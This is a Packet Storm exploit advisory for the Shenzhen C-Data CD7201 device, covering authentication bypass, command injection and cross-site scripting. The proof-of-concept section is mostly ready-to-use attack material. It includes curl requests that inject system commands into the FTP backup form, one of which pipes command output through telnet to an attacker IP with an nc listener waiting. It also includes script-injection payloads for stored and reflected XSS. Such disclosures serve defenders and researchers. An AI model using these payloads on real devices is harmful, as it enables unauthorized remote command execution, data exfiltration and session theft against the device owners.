exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Shenzhen C-Data CD7201 Command Injection / Cross Site Scripting

Shenzhen C-Data CD7201 Command Injection / Cross Site Scripting
Posted Jul 11, 2017
Authored by Codex Lynx

Shenzhen C-Data CD7201 with software version 2.4.6b and firmware version 7.1.0 suffer from authentication bypass, command injection, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | a46b9e89be16523b84bb6f26590f3b1e7d32ea836fac1a6d5afb092713e6c6e8

Shenzhen C-Data CD7201 Command Injection / Cross Site Scripting

Change Mirror Download
# Title: Shenzhen C-Data CD7201 / Multiple Vulnerabilities
# Date: 10/09/2016
# Discovered by: @codexlynx
# Vendor: Shenzhen C-Data
# Vendor homepage: cdatatec.com
# Model: CD7201
# Software Version: 2.4.6b
# Firmware Version: 7.1.0
# Category: hardware, web, rce, xss

[1]Authentication Bypass
--------------------------------
Only the main HTML iframe is protected, you can access the others via the direct URL.

- POC: Display links of the menu to bypass all the pages.

http://[target]/cgi-bin/frame.php?page=frame_menu

[2]Command Injection
--------------------------------
"FTP Backup Recovery" is insecure, you can inject system commands.
You can use "telnet" to the command output exfiltration.

- POC 1: Basic injection:

curl --data "ftp_port=21&ftp_user=admin&ftp_passwd=admin&file_name=test&ipaddr=127.0.0.1&call_function=backup&ftp_ip=\`[Inject here]\`" http://[target]/cgi-bin/system.php?page=system_management_save

- POC 2: Injection and exfiltration:

Shell 1: nc -vlp 9999
Shell 2: curl --data "ftp_port=21&ftp_user=admin&ftp_passwd=admin&file_name=test&ipaddr=127.0.0.1&call_function=backup&ftp_ip=\`[Inject here]|telnet [Attacker IP] 9999\`" http://[target]/cgi-bin/system.php?page=system_management_save


[3]Stored Cross-Site-Scripting
--------------------------------
Many metadata fields don't sanitize inputs.

- POC: Persistent XSS in the "Location" field (http://[target]/cgi-bin/system.php?page=hardware_information).

Location" style="width:90%"><script>[Javascript Here]</script><span class="

[4]Cross-Site-Scripting
--------------------------------
Many GET parameters don't sanitize inputs.

- POC: XSS in the "slave_mac" parameter.

http://[target]/cgi-bin/slaves.php?page=slave_detail_top&slave_mac="/><script>[Javascript Here]</script>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close